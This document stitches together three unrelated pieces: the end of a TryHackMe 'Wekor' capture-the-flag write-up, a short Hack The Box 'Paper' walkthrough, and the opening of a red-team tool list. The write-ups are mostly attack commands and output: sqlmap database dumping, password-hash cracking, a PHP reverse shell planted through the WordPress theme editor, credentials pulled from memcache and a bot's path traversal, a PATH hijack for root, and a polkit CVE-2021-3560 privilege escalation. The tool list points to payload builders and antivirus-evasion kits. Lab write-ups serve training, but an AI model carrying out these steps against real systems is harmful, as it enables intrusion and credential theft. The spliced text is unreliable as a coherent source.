$ sqlmap -r it_cart_coupon.xml --dump-all --threads=10
~~~
SQLmap has dumped 2 interesting databases: `coupons` and `worpress`:
~~~
┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ ll
total 24
drwxr-xr-x 2 kali kali 4096 May 11 19:45 coupons
drwxr-xr-x 2 kali kali 4096 May 11 19:45 information_schema
drwxr-xr-x 2 kali kali 4096 May 11 19:46 mysql
drwxr-xr-x 2 kali kali 4096 May 11 19:47 performance_schema
drwxr-xr-x 2 kali kali 4096 May 11 19:49 sys
drwxr-xr-x 2 kali kali 4096 May 11 19:49 wordpress
~~~
List of tables in the `wordpress` database:
~~~
┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ tree wordpress
wordpress
├── option_value-36999631.bin
├── post_content-15186792.bin
├── wp_comments.csv
├── wp_options.csv
├── wp_postmeta.csv
├── wp_posts.csv
├── wp_term_relationships.csv
├── wp_terms.csv
├── wp_term_taxonomy.csv
├── wp_usermeta.csv
└── wp_users.csv
~~~
Wordpress Users:
~~~
┌──(kali㉿kali)-[~/…/output/wekor.thm/dump/wordpress]
└─$ cat wp_users.csv
ID,user_url,user_pass,user_email,user_login,user_status,display_name,user_nicename,user_registered,user_activation_key
1,http://site.wekor.thm/wordpress,$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.,admin@wekor.thm,admin,0,admin,admin,2021-01-21 20:33:37,<blank>
5743,http://jeffrey.com,$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10,jeffrey@wekor.thm,wp_jeffrey,0,wp jeffrey,wp_jeffrey,2021-01-21 20:34:50,1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0
5773,http://yura.com,$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/,yura@wekor.thm,wp_yura,0,wp yura,wp_yura,2021-01-21 20:35:27,<blank>
5873,http://eagle.com,$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/,eagle@wekor.thm,wp_eagle,0,wp eagle,wp_eagle,2021-01-21 20:36:11,<blank>
~~~
There is an interesting information associated to the admin account: `http://site.wekor.thm/wordpress` may be the URL to Wordpress.
## Wordpress credentials
All user accounts but admin have been cracked:
~~~
┌──(kali㉿kali)-[/data/Wekor/files]
└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 1 ⚙
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou (wp_jeffrey)
xxxxxx (wp_eagle)
soccer13 (wp_yura)
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
~~~
## Wordpress
Let's add the new virtualhost:
~~~
$ echo "10.10.207.93 site.wekor.thm" | sudo tee -a /etc/hosts
~~~
Now, browsing http://site.wekor.thm/wordpress leads to a Wordpress installation. we immediately jump to http://site.wekor.thm/wordpress/wp-admin/ and try the credentials found previously. Trying the 3 accounts reveals that `wp_yura` is actually granted administrator privileges
* `admin`: Administrator, but we haven't been able to crack the password
* `wp_eagle`: Subscriber
* `wp_jeffrey`: Subscriber
* `wp_yura`: Administrator
## Reverse Shell
Now that we are logged in with admin privileges, go to "Appearance > Theme Editor", and edit the `404.php` template page to replace its content with a PHP reverse shell. Start a listener (`nc -nlvp 4444`) and browse http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php. We now have a reverse shell.
## Lateral move (www-data -> Orka)
Running linpeas.sh will reveal several services running for localhost only, 1 of which on port 11211.
~~~
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3010 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
~~~
After some reasearch on the Internet, I found [this post](https://book.hacktricks.xyz/pentesting/11211-memcache) about memcache. Let's check if we can dump cached information:
~~~
www-data@osboxes:/$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211
echo "stats items" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
STAT items:1:number 5
STAT items:1:age 1361
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
www-data@osboxes:/$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1620801753 s]
ITEM email [14 b; 1620801753 s]
ITEM salary [8 b; 1620801753 s]
ITEM password [15 b; 1620801753 s]
ITEM username [4 b; 1620801753 s]
END
www-data@osboxes:/$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
echo "get username" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
OrkAiSC00L24/7$
END
www-data@osboxes:/$
~~~
We have been able to get Orka's password: `OrkAiSC00L24/7$`
## User flag
Connect as `Orka` and get the user flag:
~~~
www-data@osboxes:/$ su Orka
su Orka
Password: OrkAiSC00L24/7$
Orka@osboxes:~$ cat /home/Orka/user.txt
1a26a6d51c0172400add0e297608dec6
~~~
User flag: `1a26a6d51c0172400add0e297608dec6`
# Root flag
## Orka's privileges
Orka can run a `bitcoin` binary as `root` with `sudo`.
~~~
Orka@osboxes:~/.ssh$ sudo -l
sudo -l
[sudo] password for Orka: OrkAiSC00L24/7$
Matching Defaults entries for Orka on osboxes:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Orka may run the following commands on osboxes:
(root) /home/Orka/Desktop/bitcoin
~~~
Checking the directory where this binary lands reveals a python script:
~~~
Orka@osboxes:~/Desktop$ ll
ll
total 20
drwxrwxr-x 2 root root 4096 Jan 23 17:45 ./
drwxr-xr-- 19 Orka Orka 4096 May 12 03:51 ../
-rwxr-xr-x 1 root root 7696 Jan 23 15:23 bitcoin*
-rwxr--r-- 1 root root 588 Jan 23 14:27 transfer.py*
~~~
Running `strings` against the binary will reveal the expected password (`password`). Let's run it:
~~~
Orka@osboxes:~/Desktop$ ./bitcoin
./bitcoin
Enter the password : password
password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 20
20
Saving 2 BitCoin(s) For Later Use
Do you want to make a transfer? Y/N : Y
Y
Transfering 2 BitCoin(s)
Transfer Completed Successfully...
~~~
## Reverse engineering (bitcoin, transfer.py)
Get a copy of both files and analyze the binary in Hopper to get the following pseudo code. We see that the binary calls a python script (`transfer.py`) with a relative path:
```c
int main(int arg0) {
ebp = &stack[-8];
*(ebp - 0xc) = *0x14;
printf("Enter the password : ");
gets(ebp - 0x7f);
esp = ((((esp & 0xfffffff0) - 0xa0) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;
if (strcmp(ebp - 0x7f, "password") != 0x0) {
puts("Access Denied... ");
}
else {
puts("Access Granted...");
sleep(0x1);
puts("\t\t\tUser Manual:\t\t\t");
puts("Maximum Amount Of BitCoins Possible To Transfer at a time : 9 ");
puts("Amounts with more than one number will be stripped off! ");
puts("And Lastly, be careful, everything is logged :) ");
printf("Amount Of BitCoins : ");
__isoc99_scanf(0x804893b);
esp = ((((((((esp - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;
eax = __ctype_b_loc();
eax = *eax;
edx = *(int8_t *)(ebp - 0x80) & 0xff;
if ((*(int16_t *)(eax + sign_extend_32(edx) + sign_extend_32(edx)) & 0xffff & 0xffff & 0x800) == 0x0) {
puts("\n Sorry, This is not a valid amount! ");
}
else {
sprintf(ebp - 0x70, "python /home/Orka/Desktop/transfer.py %c", sign_extend_32(*(int8_t *)(ebp - 0x80) & 0xff));
system(ebp - 0x70);
}
}
ecx = *(ebp - 0xc);
ecx = ecx ^ *0x14;
if (ecx != 0x0) {
eax = __stack_chk_fail();
}
else {
eax = 0x0;
}
return eax;
}
```
The python script is as follows:
```python
Orka@osboxes:~/Desktop$ cat transfer.py
cat transfer.py
import time
import socket
import sys
import os
result = sys.argv[1]
print "Saving " + result + " BitCoin(s) For Later Use "
test = raw_input("Do you want to make a transfer? Y/N : ")
if test == "Y":
try:
print "Transfering " + result + " BitCoin(s) "
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(("127.0.0.1",3010))
s.send("Transfer : " + result + "To https://transfer.bitcoins.com")
time.sleep(2.5)
print ("Transfer Completed Successfully...")
time.sleep(1)
s.close()
except:
print("Error!")
else:
print("Quitting...")
time.sleep(1)
```
## Hijack the python binary
As `python` is called with a relative path, we can hijack the python binary. Checking the `PATH` environment variable:
~~~
Orka@osboxes:/$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
~~~
Write access to /usr/sbin:
~~~
Orka@osboxes:/$ ls -la /usr/sbin/ | head
ls -la /usr/sbin/ | head
total 41284
drwxrwxr-x 2 root Orka 12288 Jan 23 16:01 . <----------------- write access
drwxr-xr-x 11 root root 4096 Feb 26 2019 ..
lrwxrwxrwx 1 root root 7 Aug 12 2020 a2disconf -> a2enmod
lrwxrwxrwx 1 root root 7 Aug 12 2020 a2dismod -> a2enmod
lrwxrwxrwx 1 root root 7 Aug 12 2020 a2dissite -> a2enmod
lrwxrwxrwx 1 root root 7 Aug 12 2020 a2enconf -> a2enmod
-rwxr-xr-x 1 root root 15424 Jul 15 2020 a2enmod
lrwxrwxrwx 1 root root 7 Aug 12 2020 a2ensite -> a2enmod
-rwxr-xr-x 1 root root 9870 Aug 12 2020 a2query
ls: write error: Broken pipe
~~~
Let's write a fake `python` binary in `/usr/bin/` that will spawn a root shell:
~~~
$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
$ chmod +x /usr/sbin/python
~~~
## Root access
Now, running the program will spawn a root shell and we can get the root flag:
~~~
Orka@osboxes:/$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
cat > /usr/sbin/python << EOF
> #!/bin/bash
> /bin/bash
> EOF
Orka@osboxes:/$ chmod +x /usr/sbin/python
chmod +x /usr/sbin/python
Orka@osboxes:/$ sudo /home/Orka/Desktop/bitcoin
sudo /home/Orka/Desktop/bitcoin
Enter the password : password
password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 20
20
root@osboxes:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7
~~~
Root flag: `f4e788f87cc3afaecbaf0f0fe9ae6ad7`
|
ERROR: type should be string, got "https://app.hackthebox.com/machines/Paper\n\n```\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ nmap 10.129.72.199\nStarting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 04:47 BST\nNmap scan report for 10.129.72.199\nHost is up (0.26s latency).\nNot shown: 997 closed tcp ports (conn-refused)\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n443/tcp open https\n\n\n```\n\n```\n[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ nikto -h 10.129.72.199\n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP: 10.129.72.199\n+ Target Hostname: 10.129.72.199\n+ Target Port: 80\n+ Start Time: 2022-06-13 04:54:30 (GMT1)\n---------------------------------------------------------------------------\n+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header 'x-backend-server' found, with contents: office.paper\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ Retrieved x-powered-by header: PHP/7.2.24\n+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE \n+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST\n\n```\n\nwhen you change the hostname to office.paper we see a new site pop up.\n\nwpscan result:\n```\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ wpscan --url http://office.paper\n_______________________________________________________________\n __ _______ _____\n \\ \\ / / __ \\ / ____|\n \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®\n \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\\n \\ /\\ / | | ____) | (__| (_| | | | |\n \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.17\n Sponsored by Automattic - https://automattic.com/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http://office.paper/ [10.129.72.199]\n[+] Started: Mon Jun 13 05:10:17 2022\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entries:\n | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\n | - X-Powered-By: PHP/7.2.24\n | - X-Backend-Server: office.paper\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] WordPress readme found: http://office.paper/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).\n | Found By: Rss Generator (Passive Detection)\n | - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>\n | - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>\n\n[+] WordPress theme in use: construction-techup\n | Location: http://office.paper/wp-content/themes/construction-techup/\n | Last Updated: 2021-07-17T00:00:00.000Z\n | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt\n | [!] The version is out of date, the latest version is 1.4\n | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1\n | Style Name: Construction Techup\n | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...\n | Author: wptexture\n | Author URI: https://testerwp.com/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:07 <=> (137 / 137) 100.00% Time: 00:00:07\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n\n[+] Finished: Mon Jun 13 05:10:38 2022\n[+] Requests Done: 169\n[+] Cached Requests: 5\n[+] Data Sent: 41.636 KB\n[+] Data Received: 167.972 KB\n[+] Memory used: 233.637 MB\n[+] Elapsed time: 00:00:20\n\n```\n\nuses insecure wordpress version\n\nWordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts\nDescription\nThis vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.\nProof of Concept\nhttp://wordpress.local/?static=1&order=asc \n\nlooking at the chats:\n\nhttp://chat.office.paper/register/8qozr226AhkCHZdyY\n\nthe pwnbox machine stopped here.\n\nin rocket chat you can interact with the bot itself\n\n```\n kellylikescupcakes Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.\nMost frequently asked questions include:\n- What time is it?\n- What new files are in your sales directory?\n- Why did the salesman crossed the road?\n- What's the content of file x in your sales directory? etc.\nPlease note that I am a beta version and I still have some bugs to be fixed.\nHow to use me ? :\n1. Small Talk:\nYou can ask me how dwight's weekend was, or did he watched the game last night etc.\neg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?\n2. Joke:\nYou can ask me Why the salesman crossed the road.\neg: 'recyclops why did the salesman crossed the road?'\n<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>\nFor security reasons, the access is limited to the Sales folder.\n3. Files:\neg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'\n4. List:\nYou can ask me to list the files\n5. Time:\nYou can ask me to what the time is\neg: 'recyclops what time is it?' or just 'recyclops time'\n\n```\n\nso you can get directory listing\n\n```\n\n Fetching the directory listing of ../../../../../etc/passwd\n-rw-r--r--. 1 root root 2842 Jan 13 10:56 /home/dwight/sales/../../../../../etc/passwd\n<!=====Contents of file ../../../../../etc/passwd=====>\nroot❌0:0:root:/root:/bin/bash\nbin❌1:1:bin:/bin:/sbin/nologin\ndaemon❌2:2:daemon:/sbin:/sbin/nologin\nadm❌3:4:adm:/var/adm:/sbin/nologin\nlp❌4:7:lp:/var/spool/lpd:/sbin/nologin\nsync❌5:0:sync:/sbin:/bin/sync\nshutdown❌6:0:shutdown:/sbin:/sbin/shutdown\nhalt❌7:0:halt:/sbin:/sbin/halt\nmail❌8:12:mail:/var/spool/mail:/sbin/nologin\noperator❌11:0:operator:/root:/sbin/nologin\ngames❌12💯games:/usr/games:/sbin/nologin\nftp❌14:50:FTP User:/var/ftp:/sbin/nologin\nnobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin\ndbus❌81:81:System message bus:/:/sbin/nologin\nsystemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin\nsystemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin\ntss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npolkitd❌998:996:User for polkitd:/:/sbin/nologin\ngeoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit❌172:172:RealtimeKit:/proc:/sbin/nologin\nqemu❌107:107:qemu user:/:/sbin/nologin\napache❌48:48:Apache:/usr/share/httpd:/sbin/nologin\ncockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin\npulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\nusbmuxd❌113:113:usbmuxd user:/:/sbin/nologin\nunbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin\nrpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\ngluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin\nchrony❌993:987::/var/lib/chrony:/sbin/nologin\nlibstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin\nsaslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin\ndnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\nradvd❌75:75:radvd user:/:/sbin/nologin\nclevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin\npegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin\nsssd❌983:981:User for sssd:/:/sbin/nologin\ncolord❌982:980:User for colord:/var/lib/colord:/sbin/nologin\nrpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\nsetroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin\npipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\ngdm❌42:42::/var/lib/gdm:/sbin/nologin\ngnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin\ninsights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin\nsshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\navahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\ntcpdump❌72:72::/:/sbin/nologin\nmysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin\nnginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin\nmongod❌976:974:mongod:/var/lib/mongo:/bin/false\nrocketchat❌1001:1001::/home/rocketchat:/bin/bash\ndwight❌1004:1004::/home/dwight:/bin/bash\n<!=====End of file ../../../../../etc/passwd=====>\n```\n\n```\n <!=====Contents of file ../hubot/.env=====>\nexport ROCKETCHAT_URL='http://127.0.0.1:48320'\nexport ROCKETCHAT_USER=recyclops\nexport ROCKETCHAT_PASSWORD=Queenofblad3s!23\nexport ROCKETCHAT_USESSL=false\nexport RESPOND_TO_DM=true\nexport RESPOND_TO_EDITED=true\nexport PORT=8000\nexport BIND_ADDRESS=127.0.0.1\n<!=====End of file ../hubot/.env=====>\n```\n\nssh into user using the id\n\n```\n[dwight@paper ~]$ ls\nbot_restart.sh hubot sales user.txt\n[dwight@paper ~]$ cat user.txt\n84c440ab09c9089e6873da2417576300\n[dwight@paper ~]$ \n```\n\nfor root\n```\n┌──(kali㉿kali)-[~]\n└─$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0\n100 758k 100 758k 0 0 136k 0 0:00:05 0:00:05 --:--:-- 172k\n\n```\n```\n┌──(kali㉿kali)-[~]\n└─$ scp linpeas.sh dwight@office.paper:linpeas.sh\nThe authenticity of host 'office.paper (10.129.128.121)' can't be established.\nECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added 'office.paper' (ECDSA) to the list of known hosts.\ndwight@office.paper's password: \nPermission denied, please try again.\ndwight@office.paper's password: \nPermission denied, please try again.\ndwight@office.paper's password: \nlinpeas.sh \n\n```\n1583c9698e80c14d2fe148f9eef37289\n\nrunning linpeas to find vuln\n\n```\n[dwight@paper ~]$ python3 explot.py\n**************\nExploit: Privilege escalation with polkit - CVE-2021-3560\nExploit code written by Ahmad Almorabea @almorabea\nOriginal exploit author: Kevin Backhouse \nFor more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\n**************\n[+] Starting the Exploit \n[+] User Created with the name of ahmed\n[+] Timed out at: 0.006805316214353887\n[+] Timed out at: 0.00775959879493205\n[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root \n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\nbash: cannot set terminal process group (95164): Inappropriate ioctl for device\nbash: no job control in this shell\n[root@paper dwight]# whoami\nroot\n[root@paper dwight]# ls\nbot_restart.sh explot.py hubot linpeas.sh sales user.txt xp.sh\n[root@paper dwight]# cat /root/root.txt\n1583c9698e80c14d2fe148f9eef37289\n````\n\n\n\n\n\n\n\n\n\n" |
# Red Teaming Toolkit
This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information intended for threat hunter can make detection and prevention control easier. The list of tools below that could be potentially misused by threat actors such as APT and Human-Operated Ransomware (HumOR). If you want to contribute to this list send me a pull request.
---
## Table of Contents
- [Reconnaissance](#Reconnaissance)
- [Initial Access](#Initial-Access)
- [Delivery](#Delivery)
- [Situational Awareness](#situational-awareness)
- [Credential Dumping](#credential-dumping)
- [Privilege Escalation](#privilege-escalation)
- [Defense Evasion](#defense-evasion)
- [Persistence](#persistence)
- [Lateral Movement](#lateral-movement)
- [Exfiltration](#exfiltration)
- [Miscellaneous](#miscellaneous)
---
## Reconnaissance
|Name|Description|URL|
|-----|-----------|----|
|RustScan|The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).|https://github.com/RustScan/RustScan|
|Amass|In-depth Attack Surface Mapping and Asset Discovery|https://github.com/OWASP/Amass|
|gitleaks|Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos.|https://github.com/zricethezav/gitleaks|
|S3Scanner|Scan for open S3 buckets and dump the contents|https://github.com/sa7mon/S3Scanner|
|cloud_enum|Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.|https://github.com/initstring/cloud_enum|
|Recon-ng|Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.|https://github.com/lanmaster53/recon-ng|
|buster|An advanced tool for email reconnaissance|https://github.com/sham00n/buster|
|linkedin2username|OSINT Tool: Generate username lists for companies on LinkedIn|https://github.com/initstring/linkedin2username|
|WitnessMe|Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.|https://github.com/byt3bl33d3r/WitnessMe|
|pagodo|pagodo (Passive Google Dork) - Automate Google Hacking Database scraping and searching|https://github.com/opsdisk/pagodo|
|AttackSurfaceMapper|AttackSurfaceMapper is a tool that aims to automate the reconnaissance process.|https://github.com/superhedgy/AttackSurfaceMapper|
|SpiderFoot|SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.|https://github.com/smicallef/spiderfoot|
|dnscan|dnscan is a python wordlist-based DNS subdomain scanner.|https://github.com/rbsec/dnscan|
|spoofcheck|A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing.|https://github.com/BishopFox/spoofcheck|
|LinkedInt|LinkedIn Recon Tool|https://github.com/vysecurity/LinkedInt|
## Initial Access
### Brute Force
|Name|Description|URL|
|-----|-----------|----|
|SprayingToolkit|Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient|https://github.com/byt3bl33d3r/SprayingToolkit|
|o365recon|Retrieve information via O365 with a valid cred|https://github.com/nyxgeek/o365recon|
|CredMaster|Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling|https://github.com/knavesec/CredMaster|
### Payload Development
|Name|Description|URL|
|-----|-----------|----|
|Ivy|Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory.|https://github.com/optiv/Ivy|
|PEzor|Open-Source PE Packer|https://github.com/phra/PEzor|
|GadgetToJScript|A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts.|https://github.com/med0x2e/GadgetToJScript|
|ScareCrow|Payload creation framework designed around EDR bypass.|https://github.com/optiv/ScareCrow|
|Donut|Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. |https://github.com/TheWover/donut|
|Mystikal|macOS Initial Access Payload Generator|https://github.com/D00MFist/Mystikal|
|charlotte|c++ fully undetected shellcode launcher ;)|https://github.com/9emin1/charlotte|
|InvisibilityCloak|Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio project.|https://github.com/xforcered/InvisibilityCloak|
|Dendrobate|Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code.|https://github.com/FuzzySecurity/Dendrobate|
|Offensive VBA and XLS Entanglement|This repo provides examples of how VBA can be used for offensive purposes beyond a simple dropper or shell injector. As we develop more use cases, the repo will be updated.|https://github.com/BC-SECURITY/Offensive-VBA-and-XLS-Entanglement|
|xlsGen|Tiny Excel BIFF8 Generator, to Embedded 4.0 Macros in *.xls|https://github.com/aaaddress1/xlsGen|
|darkarmour|Windows AV Evasion|https://github.com/bats3c/darkarmour|
|InlineWhispers|Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)|https://github.com/outflanknl/InlineWhispers|
|EvilClippy|A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.|https://github.com/outflanknl/EvilClippy|
|OfficePurge|VBA purge your Office documents with OfficePurge. VBA purging removes P-code from module streams within Office documents.|https://github.com/fireeye/OfficePurge|
|ThreatCheck|Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.|https://github.com/rasta-mouse/ThreatCheck|
|CrossC2|Generate CobaltStrike's cross-platform payload|https://github.com/gloxec/CrossC2|
